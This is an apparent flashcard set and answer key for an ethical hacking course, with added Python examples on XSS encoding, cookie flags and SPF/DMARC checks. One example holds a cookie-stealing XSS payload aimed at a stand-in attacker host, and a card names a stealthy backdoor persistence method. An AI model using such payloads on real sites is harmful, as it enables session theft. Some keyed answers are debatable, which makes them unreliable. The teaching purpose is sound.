HOD402

Final_Lam_Khac_De_Lam_Tot

450 Terms

1

An attacker successfully performs a DNS poisoning attack on an organization’s network. What is the most likely impact?

a. The attacker can access all encrypted data

b. The attacker gains administrator privileges

c. The firewall is bypassed

d. The company’s email system is disabled

e. Users are redirected to malicious websites

e. Users are redirected to malicious websites

2

What is the main risk of phishing attacks?

a. Exploiting unpatched software vulnerabilities

b. Altering DNS records

c. Tricking users into revealing sensitive information

d. Disrupting network traffic

e. Manipulating firewall configurations

c. Tricking users into revealing sensitive information

3

You are investigating a data breach at a company. You find that an attacker used stolen employee login credentials to access confidential records. What is the best long-term mitigation?

a. Disable remote access for all employees
b. Implement mandatory password changes every week
c. Enforce multi-factor authentication for logins
d. Block access to the confidential records permanently
e. Monitor all network traffic in real-time

c. Enforce multi-factor authentication for logins

4

What type of attack is an attacker performing when manipulating DNS cache records?

a. ARP poisoning

b. Phishing

c. DNS spoofing

d. SQL injection

e. Cross-site scripting (XSS)

c. DNS spoofing

5

What is the primary risk of improper input validation?

a. Increased CPU usage

b. Loss of user data

c. Remote code execution

d. System crashes

e. Slower network speeds

c. Remote code execution

6

What is the difference between horizontal and vertical privilege escalation?

a. Horizontal is related to firewall bypass, vertical is about database attacks

b. Horizontal focuses on brute force attacks, vertical focuses on SQL injection

c. Horizontal is used for lateral movement between networks, vertical is within the same machine

d. Horizontal is only possible on Windows, vertical is only on Linux

e. Horizontal involves switching accounts at the same privilege level, vertical gains higher privileges

e. Horizontal involves switching accounts at the same privilege level, vertical gains higher privileges

7

A penetration tester identifies that a target system is running an outdated version of OpenSSH. What is the most effective way to confirm whether this presents a security risk?

a. Use a web vulnerability scanner
b. Run an SQL injection test
c. Check exploit databases for known vulnerabilities
d. Attempt to brute-force SSH credentials
e. Modify SSH configurations

c. Check exploit databases for known vulnerabilities

8

What is a rogue access point?

a. A form of DNS poisoning
b. An unauthorized access point posing as a trusted one
c. A legitimate wireless network for guests
d. A secure VPN tunnel
e. A security patch for Wi-Fi networks

b. An unauthorized access point posing as a trusted one

9

An attacker successfully executes a phishing attack on an employee, obtaining their VPN credentials. What should the company implement to prevent similar attacks?

a. Implement multi-factor authentication (MFA)
b. Use network segmentation
c. Increase firewall logging
d. Disable email attachments
e. Require stronger passwords

a. Implement multi-factor authentication (MFA)

10

Which tool is commonly used for DNS reconnaissance?

a. Metasploit
b. Nikto
c. Wireshark
d. Nslookup
e. Aircrack-ng

d. Nslookup

11

You are hired to perform a penetration test on a company’s internal network. You notice that a critical database is running on an unpatched version of MySQL. What should you do first?

a. Change the admin credentials to secure the system
b. Report the issue without further testing
c. Verify the exploitability by conducting a safe proof-of-concept attack
d. Immediately exploit the known vulnerabilities
e. Modify the database schema to test access control

c. Verify the exploitability by conducting a safe proof-of-concept attack

12

A company’s employees report receiving phishing emails that appear to come from their CEO, requesting wire transfers. What security measure can best prevent this attack?

a. Require employees to change passwords frequently
b. Implement SPF, DKIM, and DMARC on email servers
c. Use antivirus software on employee computers
d. Ban external email communication
e. Restrict all outgoing wire transfers

b. Implement SPF, DKIM, and DMARC on email servers

13

What type of attack involves intercepting and altering communications between two parties?

a. Ransomware
b. SQL injection
c. Denial-of-service (DoS)
d. Phishing
e. Man-in-the-middle attack

e. Man-in-the-middle attack

14

A penetration tester successfully executes a command injection attack on a web server. What is the most likely reason this vulnerability exists?

a. The web application has excessive permissions
b. User input is not properly validated and sanitized
c. The website does not use HTTPS
d. The server is not running the latest security patches
e. The firewall is misconfigured

b. User input is not properly validated and sanitized

15

A hacker successfully exploits a website vulnerability and forces an authenticated user to execute unwanted actions on another site. What type of attack is this?

a. Cross-Site Request Forgery (CSRF)
b. Clickjacking
c. Man-in-the-Middle (MitM)
d. SQL Injection
e. Cross-Site Scripting (XSS)

a. Cross-Site Request Forgery (CSRF)

16

A penetration tester discovers that a web application allows users to enter JavaScript code in form fields. What is the likely vulnerability?

a. Cross-Site Scripting (XSS)
b. Buffer Overflow
c. Cross-Site Request Forgery (CSRF)
d. Privilege Escalation
e. SQL Injection

a. Cross-Site Scripting (XSS)

17

Which type of attack exploits vulnerabilities in the Windows SMB protocol, as seen in WannaCry?

a. Brute-force attack
b. Cross-Site Scripting (XSS)
c. EternalBlue
d. Session Hijacking
e. SQL Injection

c. EternalBlue

18

Which scenario best illustrates the concept of social engineering?

a. Running an SQL injection attack on a login form
b. Tricking an employee into revealing their login credentials
c. Exploiting a misconfigured firewall
d. Performing a brute-force attack on an SSH server
e. Using a vulnerability scanner to find open ports

b. Tricking an employee into revealing their login credentials

19

You are performing a security assessment and discover that an application uses hardcoded administrator credentials in its source code. What is the best way to mitigate this issue?

a. Store credentials securely using environment variables
b. Change the administrator username periodically
c. Require multi-factor authentication
d. Encrypt the credentials in the source code
e. Move the credentials to a comment section in the code

a. Store credentials securely using environment variables

20

A company suspects an internal employee is exfiltrating data over encrypted HTTPS connections. Which tool would best help in investigating this issue?

a. Burp Suite
b. Wireshark
c. Metasploit
d. Nmap
e. John the Ripper

a. Burp Suite

21

Which of the following best describes fingerprinting?

a. Exploiting software vulnerabilities
b. Identifying specific details about a target system
c. Intercepting network traffic
d. Conducting phishing attacks
e. Capturing biometric authentication data

b. Identifying specific details about a target system

22

During a security audit, you discover that a company’s web application does not properly implement session expiration. What is a potential risk?

a. Users may experience performance issues
b. The application will be vulnerable to DoS attacks
c. Users will have to log in frequently
d. Attackers can hijack abandoned sessions
e. The database may become overloaded

d. Attackers can hijack abandoned sessions

23

You are performing a penetration test and discover an open FTP server with anonymous login enabled. What should be your next step?

a. Report the vulnerability without further analysis
b. Check for writable directories and potential sensitive file access
c. Run a brute-force attack on the FTP credentials
d. Immediately exploit the vulnerability without documentation
e. Ignore it since anonymous FTP is a common setup

b. Check for writable directories and potential sensitive file access

24

Why is it necessary to follow a methodology in penetration testing?

a. To bypass security controls faster
b. To speed up the hacking process
c. To find vulnerabilities quickly without documentation
d. To avoid using automated tools
e. To ensure repeatable and consistent results

e. To ensure repeatable and consistent results

25

An ethical hacker is testing a web application and identifies an input field vulnerable to SQL injection. What is the best way to confirm the vulnerability?

a. Check the application’s source code for SQL vulnerabilities
b. Directly exploit the database without permission
c. Brute-force the application’s login page
d. Use automated tools like SQLmap to test for injection
e. Modify the input field manually with SQL queries and analyze responses

e. Modify the input field manually with SQL queries and analyze responses

26

During a penetration test, you gain access to a low-privilege user account on a Linux server. What is the best next step to escalate privileges?

a. Directly modify the system kernel
b. Modify the SSH configuration file
c. Attempt to brute-force the root password
d. Run sudo -l to list which commands the user may run with sudo (and whether any run as root)
e. Uninstall the firewall

d. Run sudo -l to list which commands the user may run with sudo (and whether any run as root)

27

What is the primary goal of penetration testing?

a. Improve network performance
b. Disable security controls temporarily
c. Bypass security measures undetected
d. Encrypt sensitive user data
e. Identify security vulnerabilities before attackers do

e. Identify security vulnerabilities before attackers do

28

An attacker uses Bluetooth to send unsolicited messages to nearby devices. What is this attack called?

a. Bluesnarfing
b. Bluetooth Injection
c. Bluejacking
d. Bluebugging
e. RFID Spoofing

c. Bluejacking

29

An attacker exploits a web application’s session management vulnerability to take control of a logged-in user’s session. What is this attack called?

a. Cross-Site Request Forgery (CSRF)
b. SQL Injection
c. Session Hijacking
d. Denial-of-Service (DoS)
e. Man-in-the-Middle Attack

c. Session Hijacking

30

An attacker successfully injects malicious SQL statements into a web application, extracting user credentials from the database. What could have prevented this attack?

a. Changing the database structure
b. Encrypting the database
c. Using input validation and parameterized queries
d. Blocking SQL queries from the web server
e. Implementing a stronger password policy

c. Using input validation and parameterized queries

31

Which of the following is an example of active reconnaissance?

a. Monitoring open-source intelligence (OSINT) feeds
b. Running an Nmap scan on a target network
c. Using a WHOIS lookup to find domain details
d. Conducting a social engineering attack
e. Searching Google for publicly available information

b. Running an Nmap scan on a target network

32

A company wants to prevent employees from accessing malicious websites. What security measure should they implement?

a. Disable all browser plugins
b. Block all external network traffic
c. Use only encrypted HTTP connections
d. Use a Web Application Firewall (WAF)
e. Implement a DNS filtering solution

e. Implement a DNS filtering solution

33

You are tasked with securing a Linux server against brute-force SSH attacks. Which security measure would be most effective?

a. Disable all password-based authentication
b. Change the SSH port to a non-standard number
c. Require users to change passwords every week
d. Enable multi-factor authentication (MFA)
e. Use a firewall to block all SSH connections

d. Enable multi-factor authentication (MFA)

34

A company experiences a ransomware attack, and attackers demand Bitcoin for decryption. What is the best immediate response?

a. Disconnect infected systems from the network
b. Pay the ransom to restore systems quickly
c. Delete all encrypted files
d. Attempt to modify the ransomware’s code
e. Try brute-forcing the encryption key

a. Disconnect infected systems from the network

35

You are testing a web application that allows users to upload profile pictures. What is the most significant security risk if the upload function is not properly secured?

a. The images could be stored in the wrong folder
b. Users may see distorted images on the page
c. Users could upload malware disguised as images
d. The uploaded images might load slowly
e. The website could crash due to large file sizes

c. Users could upload malware disguised as images

36

An attacker sets up a fraudulent website that mimics a bank’s login page and tricks users into entering their credentials. What type of attack is this?

a. Phishing
b. Watering Hole Attack
c. Spear Phishing
d. Credential Stuffing
e. Whaling

a. Phishing

37

A user receives a pop-up warning that their system has been infected with a virus and is prompted to download an "antivirus tool." What kind of attack is this?

a. Ransomware
b. Scareware
c. Spyware
d. Malvertising
e. Phishing

b. Scareware

38

Which attack is best prevented by implementing user input validation and output encoding in a web application?

a. Denial of Service (DoS)
b. SQL Injection
c. Session hijacking
d. Cross-Site Scripting (XSS)
e. Brute-force attack

d. Cross-Site Scripting (XSS)
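
Worked example for this card (added here; not part of the original card set): the same user input rendered without and with output encoding, plus an allowlist validator. The payload strings, the `attacker.example` host and the function names are constructed for the illustration. Note that `html.escape` is correct for an HTML text context and for a quoted attribute; other contexts (inside a `<script>` block, a URL, CSS) need their own encoder.

```python
import html
import re

# Constructed attacker input (not from the original page): a stored-XSS payload
# that ships the victim's cookie to an attacker-controlled host.
PAYLOAD = "<script>location='https://attacker.example/c?'+document.cookie</script>"
# Constructed payload for an attribute context: closes the value="" and adds an event handler.
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def validate_username(value: str) -> bool:
    """Input validation by allowlist: reject anything that is not a plain username."""
    return USERNAME_RE.fullmatch(value) is not None


def render_comment_vulnerable(comment: str) -> str:
    """Deliberately vulnerable: raw input interpolated into an HTML text context."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    """Output encoding for an HTML text context: <, >, &, \" and ' become entities,
    so the browser shows the payload as literal text instead of executing it."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_search_box(value: str) -> str:
    """Attribute context: quote the attribute AND escape quotes, or the input can
    break out of the value and add its own attributes."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


def contains_script_tag(rendered: str) -> bool:
    """Crude check used only to make the difference between the two renderers visible."""
    return SCRIPT_TAG.search(rendered) is not None
```

Validation and encoding are complementary: the allowlist stops junk from entering fields that have a known shape (usernames, IDs), while encoding protects free-text fields that legitimately may contain `<` or quotes.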

39

Which of the following scenarios is an example of privilege escalation?

a. An attacker uses social engineering to convince an employee to share their password
b. An attacker performs a brute-force attack on a web login page
c. An attacker with a standard user account exploits a vulnerability to gain administrator access
d. An attacker sends a phishing email to gain access to a system
e. An attacker intercepts a user’s login credentials

c. An attacker with a standard user account exploits a vulnerability to gain administrator access

40

What is the primary purpose of OSINT in penetration testing?

a. Gathering publicly available information
b. Cracking password hashes
c. Breaking into encrypted networks
d. Exploiting remote vulnerabilities
e. Testing SQL injection vulnerabilities

a. Gathering publicly available information

41

What is passive reconnaissance?

a. Sending phishing emails to users
b. Exploiting vulnerabilities in a network
c. Running vulnerability scans on a target network
d. Gathering information without interacting with the target
e. Actively probing a target for vulnerabilities

d. Gathering information without interacting with the target

42

What is the primary purpose of a Rules of Engagement (RoE) document?

a. Listing all vulnerabilities in a system
b. Ensuring testers work in isolation
c. Describing hacking techniques for the test
d. Defining legal scope and testing limitations
e. Outlining cybersecurity job roles

d. Defining legal scope and testing limitations

43

An attacker successfully exfiltrates customer data from a company’s database. What is the best immediate response?

a. Notify customers immediately
b. Shut down the entire network
c. Format the database and restore from backup
d. Identify and close the exploited vulnerability
e. File a lawsuit against the attacker

d. Identify and close the exploited vulnerability

44

A penetration tester finds that an organization’s internal network allows unrestricted outbound traffic. What is a potential security risk of this configuration?

a. Increased attack surface for brute-force attacks
b. Increased vulnerability to phishing attacks
c. Risk of an internal Denial of Service (DoS) attack
d. Higher likelihood of SQL injection vulnerabilities
e. Potential for data exfiltration via command and control channels

e. Potential for data exfiltration via command and control channels

45

Which of the following techniques is most effective for preventing brute-force attacks on user accounts?

a. Implementing account lockout policies
b. Changing passwords every week
c. Logging all unsuccessful login attempts
d. Using short, complex passwords
e. Disabling failed login attempts

a. Implementing account lockout policies

46

What is the primary difference between black-hat and white-hat hackers?

a. The types of organizations they target
b. Their level of expertise
c. The tools they use
d. The programming languages they use
e. Their intent and legal permissions

e. Their intent and legal permissions

47

Which of the following best defines an ethical hacker?

a. A security professional who tests systems with authorization
b. A hacker who breaks into systems without malicious intent
c. A hacker who finds vulnerabilities and sells exploits
d. A hacker who uses malware for research
e. A hacker who targets organizations for personal gain

a. A security professional who tests systems with authorization

48

Which of the following tools is commonly used for network scanning?

a. Burp Suite
b. Ettercap
c. John the Ripper
d. Nmap
e. Aircrack-ng

d. Nmap

49

An attacker successfully executes an on-path (Man-in-the-Middle) attack on a victim’s HTTPS connection. What is the likely reason this attack was successful?

a. The attacker brute-forced the TLS encryption key
b. The attacker disabled HTTPS on the server
c. The victim accepted a fraudulent security certificate
d. The attacker exploited an expired SSL certificate
e. The victim’s device does not support TLS

c. The victim accepted a fraudulent security certificate

50

What is the primary goal of privilege escalation?

a. Exploiting phishing attacks
b. Deploying ransomware
c. Intercepting network traffic
d. Identifying system vulnerabilities
e. Gaining unauthorized administrative access

e. Gaining unauthorized administrative access

51

What is an evil twin attack?

a. Setting up multiple firewalls to protect data
b. Using two-factor authentication for Wi-Fi security
c. Encrypting data before transmission
d. Creating a duplicate access point to intercept traffic
e. Disabling network access control

d. Creating a duplicate access point to intercept traffic

52

An attacker successfully performs an ARP spoofing attack. What is the likely impact?

a. They can perform a brute-force attack
b. They can execute commands on a remote system
c. They can disable all security measures
d. They can gain administrator access to a server
e. They can intercept and modify network traffic

e. They can intercept and modify network traffic

53

You are assessing a web application for vulnerabilities. A login page is vulnerable to SQL injection, but you only get generic error messages. What technique can help extract database information?

a. Attempt buffer overflow
b. Use a man-in-the-middle attack
c. Use brute-force attacks
d. Modify the server’s firewall rules
e. Use time-based blind SQL injection

e. Use time-based blind SQL injection

54

What is the main weakness of WEP encryption?

a. It is only used in enterprise networks
b. Incompatibility with newer devices
c. Strong encryption making it hard to use
d. Short key lengths and weak encryption algorithms
e. It requires a dedicated firewall

d. Short key lengths and weak encryption algorithms

55

An organization suspects that an attacker is using their Wi-Fi network to steal sensitive data. What is the best way to detect and stop this activity?

a. Use static IP addressing
b. Enable MAC address filtering
c. Monitor network traffic and analyze for anomalies
d. Disable the SSID broadcast
e. Increase the Wi-Fi signal range

c. Monitor network traffic and analyze for anomalies

56

What is the main goal of social engineering attacks?

a. Modify software code remotely
b. Exploit system vulnerabilities
c. Bypass firewalls and network defenses
d. Gain unauthorized access through human manipulation
e. Deploy ransomware attacks

d. Gain unauthorized access through human manipulation

57

What is a common method used for detecting live hosts on a network?

a. Privilege escalation
b. Data exfiltration
c. Firewall evasion
d. ARP scanning
e. DNS enumeration

d. ARP scanning

58

An attacker uses JavaScript to steal a user’s session cookie and gain unauthorized access. Which security measure can mitigate this attack?

a. Using the HttpOnly flag for cookies
b. Limiting login attempts
c. Encrypting the session token
d. Disabling JavaScript in the browser
e. Using stronger password policies

a. Using the HttpOnly flag for cookies
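
Worked example for this card (added here; not part of the original card set): a small audit of `Set-Cookie` headers that reports which cookies `document.cookie` would expose and which protective flags are missing. The two headers and the cookie names are constructed for the illustration. The caveat a practitioner should keep in mind: `HttpOnly` stops the script from reading the cookie, but it does not stop the XSS itself; injected script can still issue requests as the victim from inside the page.

```python
from typing import Dict, List

# Constructed Set-Cookie headers from two imaginary applications (not from the page).
WEAK_HEADER = "session=3f9a1c7e; Path=/"
HARDENED_HEADER = "sid=3f9a1c7e; Path=/; HttpOnly; Secure; SameSite=Lax"


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split a Set-Cookie header into name, value and a lower-cased attribute map.
    Flag attributes (HttpOnly, Secure) map to True; valued ones (SameSite=Lax) to their value."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def visible_to_script(headers: List[str]) -> List[str]:
    """Names of cookies that document.cookie would expose: exactly those without HttpOnly."""
    exposed = []
    for header in headers:
        cookie = parse_set_cookie(header)
        if "httponly" not in cookie["attrs"]:
            exposed.append(cookie["name"])
    return exposed


def audit_cookie(header: str) -> List[str]:
    """Findings for one cookie; an empty list means all three protections are present."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if "httponly" not in attrs:
        findings.append("HttpOnly missing: injected JavaScript can read the cookie and exfiltrate it")
    if "secure" not in attrs:
        findings.append("Secure missing: the cookie is also sent over plaintext HTTP")
    samesite = str(attrs.get("samesite", "")).lower()
    if samesite not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: the cookie rides along on cross-site requests (CSRF)")
    return findings
```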

59

During a penetration test, you discover that a web server is using an outdated version of Apache with a known remote code execution vulnerability. What should you do next?

a. Reinstall the Apache server
b. Verify the exploitability by attempting a safe proof-of-concept
c. Exploit the vulnerability to gain access
d. Report the issue immediately without testing
e. Modify firewall rules to block access

b. Verify the exploitability by attempting a safe proof-of-concept

60

What technique is commonly used in reconnaissance to gather domain information?

a. Password cracking
b. Firewall evasion
c. SQL injection
d. Whois lookup
e. Session hijacking

d. Whois lookup

61

An attacker uses a rogue access point to capture login credentials from unsuspecting users. What security measure can best protect against this attack?

a. Increase Wi-Fi signal strength
b. Use VPN encryption for all network traffic
c. Use static IP addresses
d. Use only wired connections
e. Disable DHCP on all devices

b. Use VPN encryption for all network traffic

62

You are conducting a penetration test and gain access to a company’s internal database. Which action aligns with ethical hacking best practices?

a. Report the vulnerability to the client and avoid further data access
b. Extract all user data to demonstrate the risk
c. Use the access to escalate privileges
d. Modify database records to test access control
e. Delete sensitive data to prevent further attacks

a. Report the vulnerability to the client and avoid further data access

63

What is a zero-day vulnerability?

a. A vulnerability that only affects Linux systems
b. A vulnerability that is unknown to the vendor, so no patch exists yet
c. A vulnerability that can only be exploited once
d. A vulnerability with an immediate patch available
e. A vulnerability that is not exploitable

b. A vulnerability that is unknown to the vendor, so no patch exists yet

64

Which protocol is commonly used for remote access to a system?

a. SNMP
b. SSH
c. HTTP
d. ICMP
e. DNS

b. SSH

65

Which of the following is NOT a key principle of ethical hacking?

a. Responsible disclosure
b. Legality
c. Exploiting without reporting
d. Documentation
e. Permission

c. Exploiting without reporting

66

An attacker successfully spoofs an organization’s email domain and sends phishing emails to employees. What should the company implement to prevent this attack?

a. Enable DNS filtering
b. Require employees to change passwords frequently
c. Disable email forwarding
d. Implement SPF, DKIM, and DMARC
e. Increase antivirus scans

d. Implement SPF, DKIM, and DMARC
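
Worked example for this card and for card 12 (added here; not part of the original card set): an offline evaluation of what SPF and DMARC records say about a forged `From:` address. The TXT records, domain names and sender IPs are constructed; a real receiver resolves them over DNS. The SPF evaluator handles only `ip4`/`ip6` mechanisms and the `all` qualifier (no `include`, `a`, `mx` or `redirect`, which need further lookups), and DKIM is left out because verifying it needs the message, its signature and the selector's public key.

```python
import ipaddress
from typing import Dict, List, Optional

# Constructed TXT records for imaginary domains (example values, not live DNS).
TXT_RECORDS: Dict[str, List[str]] = {
    "example.com": ["v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.10 -all"],
    "_dmarc.example.com": ["v=DMARC1; p=reject; rua=mailto:dmarc@example.com"],
    "weak.example": ["v=spf1 ip4:203.0.113.0/24 ~all"],
    "_dmarc.weak.example": ["v=DMARC1; p=none; rua=mailto:reports@weak.example"],
}

QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_txt(name: str) -> List[str]:
    """Stand-in for a DNS TXT query against the constructed records."""
    return TXT_RECORDS.get(name.lower(), [])


def spf_record(domain: str) -> Optional[str]:
    recs = [r for r in lookup_txt(domain) if r.lower().startswith("v=spf1")]
    return recs[0] if recs else None


def spf_check(domain: str, sender_ip: str) -> str:
    """Simplified SPF: walk the mechanisms left to right and return the qualifier
    of the first one that matches the connecting IP."""
    record = spf_record(domain)
    if record is None:
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIER:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech in ("ip4", "ip6") and ip in ipaddress.ip_network(arg, strict=False):
            return QUALIFIER[qualifier]
        if mech == "all":
            return QUALIFIER[qualifier]
    return "neutral"


def dmarc_tags(domain: str) -> Dict[str, str]:
    """Parse the _dmarc TXT record into its tag=value pairs (empty if absent)."""
    recs = [r for r in lookup_txt("_dmarc." + domain) if r.upper().startswith("V=DMARC1")]
    tags: Dict[str, str] = {}
    if recs:
        for part in recs[0].split(";"):
            key, _, val = part.strip().partition("=")
            if key:
                tags[key.strip().lower()] = val.strip()
    return tags


def spoofing_exposure(domain: str) -> List[str]:
    """Why a forged 'From: ceo@<domain>' would still be delivered, if it would."""
    issues = []
    record = spf_record(domain)
    if record is None:
        issues.append("no SPF record: any host may claim to send for the domain")
    elif not record.split()[-1].lower().endswith("-all"):
        issues.append("SPF does not end in -all: unauthorized senders only softfail or pass")
    tags = dmarc_tags(domain)
    if not tags:
        issues.append("no DMARC record: receivers are not told to reject mail failing SPF/DKIM alignment")
    elif tags.get("p") not in ("quarantine", "reject"):
        issues.append("DMARC p=none only reports; spoofed mail is still delivered")
    return issues
```

The usual rollout is `p=none` with `rua=` reporting first, to learn which legitimate senders are not yet covered, then `quarantine`, then `reject`; the CEO-fraud scenario in card 12 is only stopped once the policy is enforcing.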

67

Which statement best describes the term ethical hacker?
a. a person who uses different tools than nonethical hackers to find vulnerabilities and exploit targets
b. a person that is financially motivated to find vulnerabilities and exploit targets
c. a person that is looking to make a point or to promote what they believe
d. a person who mimics an attacker to evaluate the security posture of a network

d. a person who mimics an attacker to evaluate the security posture of a network

68

Which threat actor term describes a well-funded and motivated group that will use the latest attack techniques for financial gain?
a. hacktivist
b. state-sponsored attacker
c. organized crime
d. insider threat

c. organized crime

69

3. Which type of threat actor uses cybercrime to steal sensitive data and reveal it publicly to embarrass a target?
a. organized crime
b. hacktivist
c. insider threat
d. state-sponsored attacker

b. hacktivist

70

4. What is a state-sponsored attack?
a. An attack perpetrated by a well-funded and motivated group that will typically use the latest attack techniques for financial gain.
b. An attack perpetrated by governments worldwide to disrupt or steal information from other nations.
c. An attack perpetrated by disgruntled employees inside an organization.
d. An attack is perpetrated to steal sensitive data and then reveal it to the public to embarrass or financially affect a target.

b. An attack perpetrated by governments worldwide to disrupt or steal information from other nations.

71

5. What is an insider threat attack?
a. An attack perpetrated by a well-funded and motivated group that will typically use the latest attack techniques for financial gain.
b. An attack perpetrated by governments worldwide to disrupt or steal information from other nations.
c. An attack perpetrated by disgruntled employees inside an organization.
d. An attack is perpetrated to steal sensitive data and then reveal it to the public to embarrass or financially affect a target.

c. An attack perpetrated by disgruntled employees inside an organization.

72

What kind of security weakness is evaluated by application-based penetration tests?
a. firewall security
b. logic flaws
c. wireless deployment
d. data integrity between a client and a cloud provider

b. logic flaws

73

What two resources are evaluated by a network infrastructure penetration test? (Choose two.)
a. AAA servers
b. CSPs
c. web servers
d. IPSs
e. back-end databases

a. AAA servers

d. IPSs

74

8. When conducting an application-based penetration test on a web application, the assessment should also include testing access to which resources?
a. AAA servers
b. cloud services
c. switches, routers, and firewalls
d. back-end databases

d. back-end databases

75

9. What is the purpose of bug bounty programs used by companies?
a. reward security professionals for discovering malicious activities by attackers in the systems of the company
b. reward security professionals for fixing vulnerabilities in the systems of the company
c. reward security professionals for breaking into a corporate facility to expose weaknesses in the physical perimeter
d. reward security professionals for finding vulnerabilities in the systems of the company

d. reward security professionals for finding vulnerabilities in the systems of the company

76

10. What characterizes a partially known environment penetration test?
a. The tester must test the electrical grid supporting the infrastructure of the target.
b. The tester is provided with a list of domain names and IP addresses in the scope of a particular target.
c. The test is a hybrid approach between unknown and known environment tests.
d. The tester should not have prior knowledge of the organization and infrastructure of the target.

c. The test is a hybrid approach between unknown and known environment tests.

77

11. What characterizes a known environment penetration test?
a. The test is somewhat of a hybrid approach between unknown and known environment tests.
b. The tester could be provided with network diagrams, IP addresses, configurations, and user credentials.
c. The tester should not have prior knowledge of the organization and infrastructure of the target.
d. The tester may be provided only the domain names and IP addresses in the scope of a particular target.

b. The tester could be provided with network diagrams, IP addresses, configurations, and user credentials.

78

12. Which type of penetration test would only provide the tester with limited information such as the domain names and IP addresses in the scope?
a. known-environment test
b. partially known environment test
c. unknown-environment test
d. OWASP Web Security Testing Guide

c. unknown-environment test

79

14. Which three options are phases in the Penetration Testing Execution Standard (PTES)? (Choose three.)
a. Threat modeling
b. Penetration
c. Reporting
d. Enumerating further
e. Network mapping
f. Exploitation

a. Threat modeling

c. Reporting

f. Exploitation

80

15. Which two options are phases in the Information Systems Security Assessment Framework (ISSAF)? (Choose two.)
a. Pre-engagement interactions
b. Maintaining access
c. Reporting
d. Post-exploitation
e. Vulnerability identification

b. Maintaining access

e. Vulnerability identification

81

16. Which two options are phases in the Open Source Security Testing Methodology Manual (OSSTMM)? (Choose two.)
a. Vulnerability Analysis
b. Maintaining Access
c. Work Flow
d. Network Mapping
e. Trust Analysis

c. Work Flow

e. Trust Analysis

82

17. Which penetration testing methodology is a comprehensive guide focused on web application testing?
a. MITRE ATT&CK
b. OWASP WSTG
c. NIST SP 800-115
d. OSSTMM

b. OWASP WSTG

83

18. Which option is a Linux distribution that includes penetration testing tools and resources?
a. OWASP
b. PTES
c. SET
d. BlackArch

d. BlackArch

84

19. Which option is a Linux distribution URL that provides a convenient learning environment about pen testing tools and methodologies?
a. vmware.com
b. attack.mitre.org
c. parrotsec.org
d. virtualbox.org

c. parrotsec.org

85

20. What does the “Health Monitoring” requirement mean when setting up a penetration test lab environment?
a. The tester needs to be sure that a lack of resources is not the cause of false results.
b. The tester needs to be able to determine the causes when something crashes.
c. The tester needs to ensure controlled access to and from the lab environment and restricted access to the internet.
d. The tester validates a finding running the same test with a different tool to see if the results are the same.

b. The tester needs to be able to determine the causes when something crashes.

86

21. Which tool would be useful when performing a network infrastructure penetration test?
a. vulnerability scanning tool
b. bypassing firewalls and IPSs tool
c. interception proxies tool
d. mobile application testing tool

b. bypassing firewalls and IPSs tool

87

22. Which tool should be used to perform an application-based penetration test?
a. sniffing traffic tool
b. bypassing firewalls and IPSs tool
c. interception proxies tool
d. cracking wireless encryption tool

c. interception proxies tool

88

23. Which tools should be used to perform a wireless infrastructure penetration test?
a. web vulnerability detection tools
b. traffic manipulation tools
c. proxy interception tools
d. de-authorizing network devices tools

d. de-authorizing network devices tools

89

24. Which tools should be used for testing the server and client platforms in an environment?
a. cracking wireless encryption tools
b. vulnerability scanning tools
c. interception proxies tools
d. de-authorizing network devices tools

b. vulnerability scanning tools

90

25. Sometimes a tester cannot virtualize a system to do the proper penetration testing. What action should be taken if a system cannot be tested in a virtualized environment?
a. a full backup of the system
b. rebuild the system after any test is performed
c. adopt penetration test tools that will certainly not damage the system
d. a complete report with recommended repairs

a. a full backup of the system

91

A penetration tester gains access to a system and wants to maintain persistence. Which method is the most stealthy approach?
a. Creating a new admin account with a common name
b. Deploying a ransomware attack
c. Modifying firewall rules to allow incoming connections
d. Installing a backdoor in the startup scripts
e. Replacing a critical system binary with a malicious version

d. Installing a backdoor in the startup scripts

92

A hacker successfully exploits a SQL injection vulnerability on a login page. What is the most likely outcome?
a. The hacker crashes the web application
b. The hacker gains remote access to the operating system
c. The hacker sends phishing emails to employees
d. The hacker gains administrator access to the database
e. The hacker disables the firewall

d. The hacker gains administrator access to the database

93

Which of the following is NOT a common type of social engineering attack?
a. Shoulder surfing
b. Phishing
c. SQL injection
d. Pretexting
e. Baiting

c. SQL injection

94

Which tool is commonly used for web vulnerability scanning?
a. Nikto
b. Aircrack-ng
c. Wireshark
d. Metasploit
e. Nmap

a. Nikto

95

What has been done to the following string? %3Cscript%3Ealert('wubble');%3C/script%3E

A. Base64 encoding

B. URL encoding

C. Encryption

D. Cryptographic hashing

B. URL encoding
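
Worked example for this card (added here; not part of the original card set): decoding the string from the question and telling the four options apart mechanically. Besides the card's own string, a double-encoded variant (`%25` is an encoded `%`) is included, because filters that decode only once are routinely bypassed that way; the other sample strings and the function names are constructed.

```python
import base64
import binascii
import re
from typing import Tuple
from urllib.parse import unquote

# The string quoted in the card, and a constructed double-encoded form of it.
URL_ENCODED = "%3Cscript%3Ealert('wubble');%3C/script%3E"
DOUBLE_ENCODED = "%253Cscript%253Ealert('wubble');%253C/script%253E"

PCT = re.compile(r"%[0-9A-Fa-f]{2}")
HEX_DIGEST = re.compile(r"[0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64}")  # md5/sha1/sha256 sizes
B64 = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def url_decode_fully(s: str, max_rounds: int = 5) -> Tuple[str, int]:
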